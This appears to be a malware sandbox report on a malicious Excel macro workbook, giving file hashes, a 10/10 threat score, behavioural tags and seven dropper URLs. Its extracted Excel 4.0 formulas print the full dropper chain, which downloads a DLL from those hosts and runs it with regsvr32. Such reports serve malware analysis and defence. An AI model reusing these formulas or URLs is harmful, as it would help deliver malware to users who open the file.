Overview

overview

10

Static

static

10

9116730ccc...5.xlsm

windows7-x64

10

9116730ccc...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9116730ccc91476ed10f874ad69397ccf7e890a95be035bf4ae16735a7170845

  • Size

    32KB

  • Sample

    241120-dwy3bavjfq

  • MD5

    4c301bcf342d05d3694b76a053e05b1e

  • SHA1

    365da880c78ad6b5898a2308e4a5cc329c55b1c4

  • SHA256

    9116730ccc91476ed10f874ad69397ccf7e890a95be035bf4ae16735a7170845

  • SHA512

    f37dd5ff00e5ae6484e36dfb9db7e7d5d078cecd5f7f8d0326707e561fc71166fbd1e64748686ea1f5b9b53a0a026cec2e6407ea44d32c7cd22d34a818936b92

  • SSDEEP

    768:cjFH4QqFhN+DizXT2RdFfPdkqstJkjE6oB:2S7TkgXendkqJE62

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.aulavirtualapecc.com/server/qramDt1UIotz/

https://ingelse.net/Overview/slWIUhVtK/

http://calzadoyuyin.com/cgj-bin/uzOOL/

https://wimmergroup.com/home_tours/Pvnw2/

http://www.arkidecture.com/vendor/5Ibj6pmUm/

http://bizztream.com/images/NS85wHTdIY9N5Ay/

https://www.berekethaber.com/dosyalar/2z6RZL/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.aulavirtualapecc.com/server/qramDt1UIotz/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ingelse.net/Overview/slWIUhVtK/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://calzadoyuyin.com/cgj-bin/uzOOL/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wimmergroup.com/home_tours/Pvnw2/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arkidecture.com/vendor/5Ibj6pmUm/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizztream.com/images/NS85wHTdIY9N5Ay/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/2z6RZL/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.aulavirtualapecc.com/server/qramDt1UIotz/
xlm40.dropper

https://ingelse.net/Overview/slWIUhVtK/
xlm40.dropper

http://calzadoyuyin.com/cgj-bin/uzOOL/
xlm40.dropper

https://wimmergroup.com/home_tours/Pvnw2/
xlm40.dropper

http://www.arkidecture.com/vendor/5Ibj6pmUm/
xlm40.dropper

http://bizztream.com/images/NS85wHTdIY9N5Ay/
xlm40.dropper

https://www.berekethaber.com/dosyalar/2z6RZL/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.aulavirtualapecc.com/server/qramDt1UIotz/
xlm40.dropper

https://ingelse.net/Overview/slWIUhVtK/
xlm40.dropper

http://calzadoyuyin.com/cgj-bin/uzOOL/
xlm40.dropper

https://wimmergroup.com/home_tours/Pvnw2/

Targets

    • Target

      9116730ccc91476ed10f874ad69397ccf7e890a95be035bf4ae16735a7170845

    • Size

      32KB

    • MD5

      4c301bcf342d05d3694b76a053e05b1e

    • SHA1

      365da880c78ad6b5898a2308e4a5cc329c55b1c4

    • SHA256

      9116730ccc91476ed10f874ad69397ccf7e890a95be035bf4ae16735a7170845

    • SHA512

      f37dd5ff00e5ae6484e36dfb9db7e7d5d078cecd5f7f8d0326707e561fc71166fbd1e64748686ea1f5b9b53a0a026cec2e6407ea44d32c7cd22d34a818936b92

    • SSDEEP

      768:cjFH4QqFhN+DizXT2RdFfPdkqstJkjE6oB:2S7TkgXendkqJE62

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks